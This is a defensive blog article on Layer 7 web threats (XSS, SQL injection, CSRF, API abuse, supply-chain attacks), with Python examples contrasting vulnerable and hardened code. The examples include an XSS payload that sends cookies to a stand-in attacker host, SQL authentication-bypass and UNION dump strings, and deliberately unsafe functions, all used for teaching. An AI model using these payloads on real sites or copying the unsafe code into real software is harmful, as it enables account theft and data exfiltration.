Layer 7 Cyber Threats You Need to Know About
Date: 6 October 2024
In cybersecurity, attacks can land at any layer of your stack. If you operate in a highly networked environment, it is crucial to understand the threats that target the application layer, also known as Layer 7 of the OSI model. This is where your apps, APIs, and web pages live, interacting directly with end users.
Attacks at Layer 7 are on the rise, given the wealth of sensitive data reachable there: customer information, financial transactions, user behaviour. It goes without saying that this is some of the most important information you protect. Yet application security often gets neglected compared to the network or infrastructure layers.
So what exactly are Layer 7 attacks, and how can you harden your defences against them? Below are the top threats you face, along with actionable steps to keep you, your customers, and your business airtight.
Cross-Site Scripting (XSS)
One of your biggest risks is malicious script injection into your web pages and applications. Through flaws in how input is handled and rendered, attackers insert client-side scripts into page content that other users later view.
When your users load the altered page, the injected script runs in their browsers with the victim's privileges on your site. That lets attackers steal session cookies or tokens to hijack accounts, read any data the victim can see (including whatever your app fetches from its databases on the victim's behalf), perform actions as the victim, serve malware payloads, deface pages, redirect victims to phishing sites, and more.
These script injections are known as XSS (cross-site scripting). Reflected XSS hits one user at a time through a crafted link; stored (persistent) XSS is the most dangerous subtype because the payload is saved server-side and served to every user who views the affected page. Watch out: XSS payloads often arrive through seemingly harmless vectors such as site search, URL parameters, tracking pixels, Referer headers, form fields, error messages, and beyond.
How to defend?
- Output encoding is paramount: escape every piece of untrusted data for the context it is rendered into (HTML body, attribute, JavaScript, URL) at the moment you render it. Input validation and sanitising help, but encoding at output is what actually stops the browser from treating data as code.
- A WAF (web application firewall) adds a second layer, spotting XSS vectors with signature analysis, heuristics, machine learning models, and threat intel feeds. Treat it as defence in depth, not a substitute for fixing the code: encoded and obfuscated payloads do get past filters.
- Enable a CSP (Content Security Policy) telling browsers exactly which script sources and origins are valid on your domains. A nonce- or hash-based script-src blocks injected inline script even when an encoding bug slips through.
- Regular pen testing spots XSS flaws before criminals find them. Back it with a robust SDLC (software development lifecycle) that prioritises security at every coding stage, including auto-escaping templates and code review of anything that renders raw HTML.
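The contrast between raw rendering, contextual output encoding, and a nonce-based CSP, as an added example that is not code from the original article. The payload, the attribute breakout string, and the page structure are constructed for illustration; the policy string is one reasonable CSP, not a universal one.

```python
import html
import secrets

# Constructed attacker payload: a "search term" that, rendered raw, runs script
XSS_PAYLOAD = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'


def render_search_unsafe(term: str) -> str:
    """Vulnerable: untrusted input concatenated straight into the HTML body."""
    return f"<p>Results for: {term}</p>"


def render_search_safe(term: str) -> str:
    """Hardened: encode for the HTML body context at output time."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def render_attribute_safe(term: str) -> str:
    """Attribute context: encode AND quote the attribute. An unquoted attribute
    can be broken out of with a space even when < and > are encoded."""
    return f'<input type="search" name="q" value="{html.escape(term, quote=True)}">'


def new_script_nonce() -> str:
    """Fresh per-response nonce; the same value goes on every legitimate <script>."""
    return secrets.token_urlsafe(16)


def csp_header(nonce: str) -> str:
    """Content-Security-Policy allowing only same-origin scripts and inline
    scripts that carry this response's nonce, so injected script does not run."""
    return (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; "
        "base-uri 'none'"
    )


def contains_live_script(markup: str) -> bool:
    """Crude check used only to show the difference: a real <script> tag
    survives in the unsafe rendering and not in the encoded one."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_search_unsafe(XSS_PAYLOAD))
    print(render_search_safe(XSS_PAYLOAD))
    print(render_attribute_safe('" autofocus onfocus="alert(1)'))
    print("Content-Security-Policy:", csp_header(new_script_nonce()))
```

The attribute case is the one teams most often get wrong: `html.escape` with `quote=True` turns the closing quote into `&quot;`, but only because the attribute is itself quoted. The CSP is the safety net for the encoding bug you have not found yet.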
SQL Injection (SQLi)
Another common and dangerous attack targets your backend databases by injecting malicious SQL. Known as SQLi (SQL injection), it lets attackers steal, manipulate, or destroy the critical data driving your operations.
The entry point is typically any input that gets concatenated into a query: website form fields, URL and API parameters, headers, cookies. Because the database cannot tell where your query ends and the attacker's text begins, the injected SQL piggybacks into the queries and commands that touch your data.
Once the injected SQL reaches your data layer, attackers can trick the database into:
- Dumping entire tables or databases into the attacker's hands
- Modifying, corrupting, or deleting records
- Executing damaging commands such as dropping tables or, where the database account allows it, reading sensitive OS files
- Stealing and cracking stored password hashes, including admin accounts, to keep access to the database
With your database compromised, criminals can steal intellectual property, alter financial data, harvest customer PII for identity theft, hold data ransom, cause regulatory violations, and create general chaos.
How to defend?
- Use parameterised queries (prepared statements) for every query that touches user-supplied data. The query text is fixed and input is bound only as data, so it is never parsed as SQL. This is the fix; everything below is defence in depth.
- Validate and sanitise input at the interfaces that reach the database anyway: types, lengths, and allow lists of expected values. Never trust user-supplied data!
- Lock down database user permissions. The application account should have only the tables and operations it needs, never DBA rights or file-system access. Monitor database logs for unusual queries and errors to catch attackers probing.
- WAF rules can screen payloads for known injection fingerprints and anomalous query shapes, stopping the noisy attempts before they reach your app.
- Frequent pen testing pinpoints flaws human eyes may miss before SQLi strikes in production. Prioritise rapid patching of the vulnerabilities it finds.
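A vulnerable login query beside its parameterised form, run against an in-memory SQLite database, as an added example that is not code from the original article. The table, the sample users and the two attacker strings are constructed for illustration; a real application would compare a salted password hash in code rather than in the query.

```python
import sqlite3

# Constructed sample data; a real app would store proper salted password hashes
SAMPLE_USERS = [
    ("alice", "hash-of-alice-pw", "admin"),
    ("bob", "hash-of-bob-pw", "user"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, role) VALUES (?, ?, ?)",
        SAMPLE_USERS,
    )
    return conn


def login_unsafe(conn, username: str, password_hash: str) -> list:
    """Vulnerable: user input spliced into the SQL text, so quotes and comment
    markers in the input rewrite the query."""
    sql = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password_hash = '{password_hash}'"
    )
    return conn.execute(sql).fetchall()


def login_safe(conn, username: str, password_hash: str) -> list:
    """Hardened: the query text is a constant; values are bound as parameters
    and can never change the statement's structure."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(sql, (username, password_hash)).fetchall()


# Constructed attacker inputs: authentication bypass, then a UNION-based dump
AUTH_BYPASS = "' OR '1'='1' --"
UNION_DUMP = "' UNION SELECT username, password_hash FROM users --"

if __name__ == "__main__":
    db = make_db()
    print("unsafe, bypass :", login_unsafe(db, AUTH_BYPASS, "wrong"))
    print("unsafe, dump   :", login_unsafe(db, UNION_DUMP, "wrong"))
    print("safe, bypass   :", login_safe(db, AUTH_BYPASS, "wrong"))
    print("safe, real     :", login_safe(db, "alice", "hash-of-alice-pw"))
```

With the unsafe function the bypass string returns every user and the UNION string returns the password hash column; the safe function treats both strings as a username that does not exist and returns nothing.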
Cross-Site Request Forgery (CSRF)
CSRF is another trending threat, targeting users who are already authenticated to an application or service. The attacker tricks the victim's browser into sending a request the victim never intended, so that unauthorised commands, transactions, or state changes execute under the victim's identity.
CSRF payloads typically ride phishing links and emails, malicious sites and popups, clickjacking traps, widget iframes, or hidden HTML forms and image tags that fire HTTP requests. Victims hit these booby-trapped pages while still logged in to a separate web app.
Background requests then fire at the apps the user is logged into, and the browser automatically attaches the user's session cookies. The server sees a valid session and, with no secondary check that the user meant to send this particular request, treats it as legitimate. The attacker usually cannot read the response, but does not need to; these "blind attacks" let hackers:
- Initiate wire transfers from bank apps
- Change user email/passwords via account settings pages
- Trigger state-changing API calls the victim is authorised to make (CSRF is about changing data, not reading it, since the attacker's page cannot see the response)
- Post embarrassing social media updates
- Trigger unwanted purchases or signups
- Spread malware via file uploads
How to defend?
CSRF seems complex but has straightforward protections:
- Issue an unpredictable anti-CSRF token, bound to the user's session, and require it in every state-changing request in addition to the session cookie. Because the attacker's page cannot read the token, the forged request fails validation.
- Reserve GET for reading data and use POST (or PUT/DELETE) for anything that changes state, so a plain link or image tag cannot trigger an action.
- Set the SameSite attribute on session cookies (Lax or Strict) so browsers do not attach them to cross-site requests. This closes most CSRF paths on modern browsers but complements tokens rather than replacing them.
- WAFs offer collective protections, such as IP reputation blocking, virtual patching of new threats, and machine learning for anomaly detection.
- User-side hygiene helps at the margins: log out of sensitive apps when done and limit untrusted browser extensions and plugins. A VPN on its own does not prevent CSRF, because the forged request is sent by the victim's own browser over the normal connection.
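The synchronizer-token pattern, the POST-only rule and the SameSite cookie from the list above, as an added example that is not code from the original article. The `Session` class, the `/transfer` form and the request dictionaries are constructed stand-ins for whatever web framework you use; the status codes are the ones a handler like this would return.

```python
import hmac
import secrets


class Session:
    """Server-side session. The anti-CSRF token is generated once per session,
    unguessable, and never exposed in a cookie (hypothetical session store)."""

    def __init__(self):
        self.id = secrets.token_urlsafe(32)
        self.csrf_token = secrets.token_urlsafe(32)


def session_cookie_header(session: Session) -> str:
    """SameSite stops the browser attaching the cookie to cross-site requests;
    Secure and HttpOnly limit theft over plain HTTP and via script."""
    return f"Set-Cookie: sid={session.id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def render_transfer_form(session: Session) -> str:
    """Legitimate page: the token rides in a hidden field that a page on
    attacker.example cannot read because of the same-origin policy."""
    return (
        '<form method="POST" action="/transfer">'
        f'<input type="hidden" name="csrf_token" value="{session.csrf_token}">'
        '<input name="to"><input name="amount"><button>Send</button></form>'
    )


def handle_transfer(session: Session, method: str, form: dict) -> tuple:
    """Server handler for a state change. Returns (status, message)."""
    if method != "POST":
        # A link or <img src> can only produce GET; refuse to act on it
        return (405, "state change requires POST")
    submitted = form.get("csrf_token", "")
    # Constant-time compare so token checking does not leak by timing
    if not hmac.compare_digest(submitted, session.csrf_token):
        return (403, "CSRF token missing or mismatched")
    return (200, f"transfer of {form.get('amount')} to {form.get('to')} accepted")


if __name__ == "__main__":
    s = Session()
    print(session_cookie_header(s))
    # Forged request from attacker.example: the cookie rides along, the token does not
    print(handle_transfer(s, "POST", {"to": "attacker", "amount": "1000"}))
    # Legitimate submission of the rendered form
    print(handle_transfer(s, "POST", {"to": "bob", "amount": "10", "csrf_token": s.csrf_token}))
```

The forged request is indistinguishable from a real one at the cookie layer; the only thing separating them is the hidden-field token the cross-origin page could never obtain.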
API Abuse
APIs serve crucial functions these days, enabling flexible data exchange between services, partners, apps, and users behind the scenes. Public-facing APIs open your capabilities to a broader ecosystem. However, each endpoint is another attack surface. Whether GraphQL, REST, SOAP, or proprietary, these machine-readable interfaces give access to backend resources just like a website or a human login portal.
Yet APIs run 24/7, are reachable from anywhere, and are built for automation, often with self-describing schemas that make endpoints easy to enumerate. That makes them easy prey for attackers who script brute forcing at scale. Common API attack vectors:
- Credential stuffing with mass-leaked username/password lists, for account hijacking and data theft
- DDoS floods to overwhelm systems and cause outages
- Reverse engineering mobile and web clients to find undocumented endpoints and logic flaws for deeper infrastructure infiltration
- Bots repeatedly scanning for vulnerabilities such as injection flaws
- Fuzzing to find undiscovered defects
- Man-in-the-middle interception and data manipulation where transport security is weak
How to defend?
- Authenticate with OAuth 2.0 or short-lived signed tokens rather than static passwords or long-lived API keys alone, and scope tokens to the minimum the client needs. Device fingerprinting adds a useful risk signal on top but is not authentication by itself.
- Use per-request nonces or timestamps in signed requests to stop replay, and rate limit per user, per token, and per source IP (with lockout or step-up authentication after repeated failures) to blunt brute forcing and credential stuffing.
- Restrict the IP ranges allowed to call private APIs. Check headers and payloads for signs of scripted clients versus real users.
- Route API traffic through a WAF or API gateway that proxies requests. Train ML models on typical API behaviour to detect anomalies.
- Enable meticulous API security logging (caller, token, endpoint, result) for fast incident response. Scan code repos for secrets and API keys checked into source control.
- Test APIs with the same proxy, fuzzing, and replay tools attackers use, to confirm they withstand real-world tactics.
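A per-key token-bucket rate limiter and a credential-stuffing detector run over a handful of auth log lines, as an added example that is not code from the original article. The log format, the IP addresses, the user names and the threshold are constructed for illustration; the detection rule (one source failing against many distinct accounts) is the general signature the text describes, not a rule from any particular product.

```python
import re
from collections import defaultdict


class TokenBucket:
    """Per-key token bucket: `capacity` burst, refilled at `refill_per_sec`.
    `now` is passed in explicitly so behaviour is deterministic and testable."""

    def __init__(self, capacity: int, refill_per_sec: float):
        self.capacity = capacity
        self.rate = refill_per_sec
        self._state = {}  # key -> [tokens, last_seen]

    def allow(self, key: str, now: float) -> bool:
        tokens, last = self._state.get(key, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.rate)
        if tokens >= 1:
            self._state[key] = [tokens - 1, now]
            return True
        self._state[key] = [tokens, now]
        return False


# Constructed auth log: one IP spraying many accounts, one IP retrying a single account
SAMPLE_AUTH_LOG = """\
2024-10-06T09:00:01Z POST /v1/login ip=203.0.113.7 user=alice result=fail
2024-10-06T09:00:01Z POST /v1/login ip=203.0.113.7 user=bob result=fail
2024-10-06T09:00:02Z POST /v1/login ip=203.0.113.7 user=carol result=fail
2024-10-06T09:00:02Z POST /v1/login ip=203.0.113.7 user=dave result=fail
2024-10-06T09:00:03Z POST /v1/login ip=203.0.113.7 user=erin result=fail
2024-10-06T09:00:03Z POST /v1/login ip=203.0.113.7 user=frank result=success
2024-10-06T09:00:04Z POST /v1/login ip=198.51.100.4 user=alice result=fail
2024-10-06T09:00:09Z POST /v1/login ip=198.51.100.4 user=alice result=fail
2024-10-06T09:00:15Z POST /v1/login ip=198.51.100.4 user=alice result=success
"""

LOG_LINE = re.compile(r"ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\S+)")


def distinct_failed_users_by_ip(log: str) -> dict:
    """Count how many different accounts each source IP has failed to log into."""
    seen = defaultdict(set)
    for line in log.splitlines():
        m = LOG_LINE.search(line)
        if m and m.group("result") == "fail":
            seen[m.group("ip")].add(m.group("user"))
    return {ip: len(users) for ip, users in seen.items()}


def detect_credential_stuffing(log: str, threshold: int = 5) -> list:
    """Flag source IPs that fail against at least `threshold` distinct accounts:
    the shape of a leaked-list replay, unlike one user mistyping a password."""
    counts = distinct_failed_users_by_ip(log)
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    bucket = TokenBucket(capacity=5, refill_per_sec=1.0)
    print([bucket.allow("client-a", 100.0) for _ in range(7)])
    print(detect_credential_stuffing(SAMPLE_AUTH_LOG))
```

Note that the stuffing IP also scores one success: that is the whole point of the attack, and why the detector keys on distinct failed accounts rather than on failure rate alone.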
Supply Chain Attacks
With the growth of SaaS apps and low-code platforms, you increasingly rely on an ecosystem of integrated third-party technologies. These form digital supply chains, powering operations through shared data and access. But cybercriminals realize that if any link in your supply chain falls, the effects propagate through your entire stack!
By compromising just one SaaS platform through tactics like:
- Exploiting vulnerabilities
- Stealing insider credentials
- Abusing permissions settings
- Manipulating unvalidated data flows
Attackers gain an initial foothold and move laterally into your networks through the trust and access you granted the supplier. From there they can steal data, trigger technology failures, or pivot to your other suppliers to unleash more widespread damage, and the blast radius grows with every link.
How to defend?
- Treat third parties as extensions of your own infrastructure.
- Vet supplier code integrity, security standards, and practices deeply during selection. Audit them regularly post-integration.
- Segment network access and data shares according to least privilege: a supplier integration gets only the endpoints, scopes, and records it needs.
- Use SOC 2 reports and similar attestations on cloud services as assurance checks, remembering that they describe controls at a point in time.
- Enable activity logging on both sides of every integration to trace anomalies in cross-system relationships.
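Two concrete checks behind "vet supplier code integrity" and "unvalidated data flows": pinning the digest of a reviewed third-party artifact, and authenticating an inbound supplier webhook with an HMAC before acting on it. This is an added example, not code from the original article; the artifact bytes, the shared secret, the webhook body and the `sha256=` signature format are constructed for illustration and do not describe any real vendor.

```python
import hashlib
import hmac

# Constructed stand-ins for a vendor artifact and a vendor webhook
GOOD_ARTIFACT = b"vendor-sdk 1.4.2 contents (constructed sample bytes)"
WEBHOOK_SECRET = b"shared-secret-from-vendor-portal-(constructed)"
WEBHOOK_BODY = b'{"event":"invoice.updated","id":"inv_42","status":"paid"}'


def pin_artifact(data: bytes) -> str:
    """Record the digest of an artifact you actually reviewed. Store the pin
    in your own repo; never fetch it from the supplier at install time."""
    return hashlib.sha256(data).hexdigest()


def verify_artifact(name: str, data: bytes, pins: dict) -> bool:
    """Reject anything unpinned, and anything whose digest drifted from the pin."""
    expected = pins.get(name)
    if expected is None:
        return False
    return hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected)


def sign_webhook(secret: bytes, body: bytes) -> str:
    """What a well-behaved supplier sends alongside the body (hypothetical
    header format; real vendors document their own)."""
    return "sha256=" + hmac.new(secret, body, hashlib.sha256).hexdigest()


def verify_webhook(secret: bytes, body: bytes, signature_header: str) -> bool:
    """Authenticate the inbound data flow over the raw bytes, in constant time,
    before any JSON parsing or business logic runs."""
    return hmac.compare_digest(sign_webhook(secret, body), signature_header)


if __name__ == "__main__":
    pins = {"vendor-sdk-1.4.2.tar.gz": pin_artifact(GOOD_ARTIFACT)}
    print(verify_artifact("vendor-sdk-1.4.2.tar.gz", GOOD_ARTIFACT, pins))
    print(verify_artifact("vendor-sdk-1.4.2.tar.gz", GOOD_ARTIFACT + b"\x00", pins))
    sig = sign_webhook(WEBHOOK_SECRET, WEBHOOK_BODY)
    print(verify_webhook(WEBHOOK_SECRET, WEBHOOK_BODY, sig))
    print(verify_webhook(WEBHOOK_SECRET, WEBHOOK_BODY.replace(b"paid", b"refunded"), sig))
```

The two checks fail closed: an artifact with no pin is rejected rather than trusted on first use, and a webhook body altered by one byte no longer matches its signature.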
Final Word
No environment will ever be 100% bulletproof against intrusions, but combining prudent precautions goes a long way. Make security processes a regular habit, not a rushed checklist. Promote cultural norms for cyber safety that get the entire organisation invested in protection. And as new attack trends emerge, step back and review the latest guidance.